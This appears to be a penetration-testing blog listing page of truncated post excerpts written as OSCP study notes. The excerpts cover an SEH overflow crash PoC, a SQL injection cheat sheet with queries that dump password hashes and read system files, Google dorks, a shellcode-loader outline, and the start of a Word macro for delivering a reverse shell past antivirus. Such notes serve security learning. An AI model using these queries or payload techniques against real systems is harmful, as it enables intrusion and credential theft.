SEH Stack Buffer Overflow

After a long time, I am again practicing how to exploit stack-based buffer overflows. This post is just a quick note on how to exploit a simple SEH-based overflow. The existing exploit can be found at https://www.exploit-db.com/exploits/50471

Application download link: https://www.exploit-db.com/apps/762256b7bcc2d7d47a394a52f522b16b-ytgrabber.exe

Crash the application. POC code:

```python
# Write 9000 "A" characters to testing.txt; this input is what crashes the application
buffer = "A" * 9000
createFile = open('testing.txt', "w")
createFile.write(buffer)
createFile.close()
```

Start Youtube Video Grabber and attach in WinDbg. Open testing.txt, copy the content, click on the Enter code button, and paste into the Username and Serial number fields:
SQL Injection Cheat Sheet

Enumeration: gather some juicy info to move to higher privileges.

MySQL:

| Information | SQL Query |
|---|---|
| Database version | `select @@version` |
| Current database | `select database()` |
| Names of other databases | `select schema_name from information_schema.schemata` |
| Database user | `select user()` or `select system_user()` |
| Database users and password hashes | `select host, user, password from mysql.user` |
| Table names | `select table_schema, table_name from information_schema.tables` or `select table_name from information_schema.tables where table_schema='userdb'` |
| Column names | `select table_name, column_name from information_schema.columns` or `select column_name from information_schema.columns where table_name = 'usertable'` |
| Read system files | `select load_file('/etc/hosts')` |
| Write to file | `select "<?` |
A quick cheat sheet on Python

This is not a complete Python 3 tutorial. This is just a quick note to remember the Python 3 syntax.

Python data types:

| Name | Type | Description |
|---|---|---|
| Integer | int | Numbers such as 100, 200, 1337 |
| Strings | str | One or more characters, such as "Cyber" |
| Booleans | bool | Logical value: True or False |
| Floating Point | float | Numbers with a decimal point, such as 1.1 |
| Lists | list | Sequence of objects: ["Cyber", 10] |
| Dictionaries | dict | Key/value pairs: {"key1": "Cyber", "key2": "Red"} |
| Sets | set | Collection of unique objects: {"test", "test1"} |
| Tuples | tuple | Ordered sequence of objects: (1, "Cyber") |

String: here is an example of string indexing and slicing:
Web App Enumeration

Enumerate using Google: using Google or another search engine we may be able to gather some valuable information. We can search for:

- Config files
- SQL files
- Usernames, private keys, even passwords
- Error messages
- Any other technical messages

Mostly I use the following queries:

```
#Find pages
site: site.com
#Find subdomains
site: site.com -www
#Find files php/jsp/aspx/asp/cfm/sql
site: site.com filetype:php
#Find the page if keywords match in the title
site: site.com intitle: admin login
#If the title matches our keyword
site: site.
```
Web Pentesting Checklist

For web pentesting, there are lots of things to test. Below I have created a mandatory list of what I never miss testing. The goal? Reverse shell! Note: this checklist was created with the help of the OWASP Testing Guide and other resources found on the Internet.

Recon/Enumeration

- Discover information using Google, Bing, Shodan, GitHub, Twitter, and LinkedIn
- Check if robots.txt, crossdomain.xml, clientaccesspolicy.xml, phpinfo.php, sitemap.xml exist
- Identify Web Application Firewall
- Brute force subdomains
- DNS reverse lookup
- Brute force files and directories
- Analyze SSL
- Crawl entire site
- Find emails, employees, phone numbers, etc.
- Wayback history
- Nmap: scan all ports (including UDP) and do banner grabbing
- Identify input points

Error Handling

- Request fake pages
- Try different HTTP methods such as TRACE, OPTIONS, DEBUG, NONE
- Request multiple parameters with different values (I.
Linux Privilege Escalation

I have recently written a cheat sheet for Windows privilege escalation and am updating it continually. Privilege escalation is a very important skill in real-world pentesting, or even for the OSCP. So whatever I learned during my OSCP journey, I took notes. I have organized my notes as a cheat sheet and decided to share them publicly, in case they are useful for someone. These techniques were collected from various sources on the Internet and from videos, and tested in HTB, CyberSecLabs, and home labs.
Windows Privilege Escalation

In the OSCP exam, only gaining access is not enough. Most of the machines may require escalating to higher privileges. To learn more about Windows privilege escalation I have taken a course from Udemy, watched IPSec YouTube videos, and read tutorials from various sources. Whatever I learned, I took notes. I have organized my notes as a cheat sheet and now it is public. Note: a cheat sheet is not understandable without basic knowledge!
Penetration Testing CheatSheet

While I was studying for the OSCP from various sources, I took notes and made a quick cheat sheet so that I don't need to search for the same thing again and again. I am sharing this cheat sheet as I think it might be useful for someone.

Enumeration: enumeration is the most important part. All findings should be noted for future reference. Without enumeration, we will have a hard time exploiting the target.

Basic Enumeration: whenever I start pentesting an IP address, my favorite starting tool is nmap.
Bash Script Cheat Sheet

Hello REDTM

```bash
#!/usr/bin/bash
# This is a comment
echo "Hello REDTM"
printf "Hello REDTM"
```

Save as hello.sh, give it execute permission with chmod +x hello.sh, and run ./hello.sh

Parameters

```bash
#!/usr/bin/bash
# This is a comment
echo -e "Hello $1"
printf "Hey, how is it goin $1?"
echo ""
```

$1 is the first parameter; the second parameter is $2, and so on.

Variables: variables are used to store data for later use by referencing the variable name!
Custom Malware in C++

This is not a tutorial guide or course. I wrote this as my notes. But you can also utilize my idea if you have a basic understanding of C++ and the Windows API.

Understanding 5 Win API functions. What is the idea to execute our shellcode?

1. Allocate memory space as RW to store our shellcode
2. Copy our shellcode to that memory
3. Make the memory executable
4. Run the payload
5. Wait for it to exit

VirtualAlloc: this function allocates memory space.
Hashcat Cheat Sheet

As a penetration tester we can't ignore hash cracking, even if we can do pass-the-hash. Hash cracking could be one of the last resorts if nothing else works. Hashcat is the most popular and fastest program to crack password hashes. I have included the most common techniques that can be used in hashcat to crack password hashes.

Installation:

```bash
apt install cmake build-essential -y
apt install checkinstall git -y
git clone https://github.com/hashcat/hashcat.git
cd hashcat   # build from inside the cloned source tree
make && make install
```

Performance on nVidia 3080 Ti. Performance check for all supported hashes:
Microsoft Word Macro Payload

Delivering a reverse shell payload via an Office macro is old but still works if you can bypass AV.

Get your code ready: start Microsoft Office 2016 Pro Plus, go to the View tab and click Macros > View Macros. Give the macro a name, select "Macros in Document1" and click Create. Paste the below code and save as a Word Macro-Enabled Document or Word 97-2003 Document.

```vba
Sub TestMacro()
'
' TestMacro Macro
'
'
cmd = "calc.
```